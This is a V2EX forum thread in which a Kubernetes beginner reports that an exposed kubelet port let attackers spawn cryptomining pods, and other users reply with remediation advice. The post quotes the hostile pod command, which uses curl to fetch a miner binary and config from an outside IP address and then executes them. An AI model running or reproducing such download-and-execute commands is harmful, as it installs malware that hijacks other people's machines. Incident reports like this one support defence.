k8s 被人拿去挖矿了

2018-08-02 18:36:54 +08:00

shisang

在腾讯云学生机上自己折腾 k8s，并把 blog 部署在上边，结果两天上去怎么多那么多 pod。

top

kubectl get pods

ps aux | grep k.conf

查看 /tmp/docker, 没有了估计是屁股被擦干净了。

订阅轻重一个 pod

Command:
      sh
      -c
      curl -o /var/tmp/config.json http://192.99.142.232:8220/2.json;curl -o /var/tmp/suppoie http://192.99.142.232:8220/rig;chmod 777 /var/tmp/suppoie;cd /var/tmp;./suppoie -c config.json

找到了一篇一样遭遇的文章http://www.lijiaocn.com/%E9%97%AE%E9%A2%98/2018/07/20/kubernetes-docker-cpu-high.html 按照作者所说应该是 10250 端口暴露到外网了。

netstat -lnpt | grep 10250 果不其然。

先杀死挖矿 pods，

kubectl get pods | grep y1ee4 | awk '{print $1}' | xargs kubectl delete --grace-period=0 --force pods

kubectl get pods

有重新创建了，日了

kubectl get rc 然后 delete rc，赶紧查看是不是哪里配置写错了。

新手，大神路过指导一二。

6458 次点击

所在节点

问与答

24 条回复

shisang

2018-08-02 18:46:59 +08:00

消灭零回复

des

2018-08-02 18:52:32 +08:00

重装最简单了

shisang

2018-08-02 18:53:14 +08:00

@des 要不要那么暴力

wtks1

2018-08-02 18:53:46 +08:00

重装是最暴力但最有效的办法

murmur

2018-08-02 19:02:34 +08:00

@shisang linux 没杀软没那么多 windows 的花式检查工具真的只能重装

murmur

2018-08-02 19:02:53 +08:00

别人甚至还可以替换掉你的常用命令

artandlol

2018-08-02 19:02:56 +08:00

@wtks1 只要不是用 root 用户登 docker 就没必要重装

artandlol

2018-08-02 19:11:52 +08:00

启 rbacc 客户端启用 token docker 用户不应该是 root

qfdk

2018-08-02 19:12:02 +08:00

docker 开了 remote api 了吧我也中了都是 docker 中运行然后从容器里跑出来的最后让我消灭了…… 本来是开了 api 做测试的两天就被挖坑了

artandlol

2018-08-02 19:15:29 +08:00

然后 kubectl -o 出 yamll 然后 delete 看你是用 root 跑，最好还是回滚到之前的

abmin521

2018-08-02 20:02:25 +08:00

刚好研究过
关闭 kubelet 的匿名访问双向 tls 就行了
kubeadm 就没有这个 bug
有空准备扫一波

cqxxxxxxx

2018-08-02 20:58:50 +08:00

lz 是一台机器 minikube 搭的 k8s?还是好几台机器搭的集群？

DesignerSkyline

2018-08-02 21:20:12 +08:00

重装吧，二进制已经被污染了

shisang

2018-08-02 22:33:18 +08:00

@abmin521 之前在 vultr 是 kubeadm 装过，运行挺好，就是国内装不上，用 privoxy 代理也不行。但是 vultr 坑爹了，重启后 ip ping 不通，要手动修改网络配置。要手动在网页 console 输入密码十几次每一次对的，最后客服说可以通过 sysroot 修改密码，按照文档操作后直接 unknown user，弃坑~！

shisang

2018-08-02 22:34:35 +08:00

@cqxxxxxxx 1cpu 2G memory 的鹅厂学生机，源码安装的单节点~~~~~逃

shisang

2018-08-02 22:41:49 +08:00

@qfdk 没有该 docker，是 k8s 污染进来的

mritd

2018-08-03 00:05:07 +08:00

你多半是看了那个无良教程 apiserver 监听 :8080 了吧

E1n

2018-08-03 01:19:47 +08:00

单机能学到什么东西，褥 gcp 玩玩集群吧

580a388da131

2018-08-03 01:27:55 +08:00

不是有安全组吗？你开了所有端口？

0312birdzhang

2018-08-03 08:09:08 +08:00

直接删 pod 要是能删掉的话 deployment、rc、daemonset 是干嘛的😷

第 1 页／共 2 页

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/476377

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.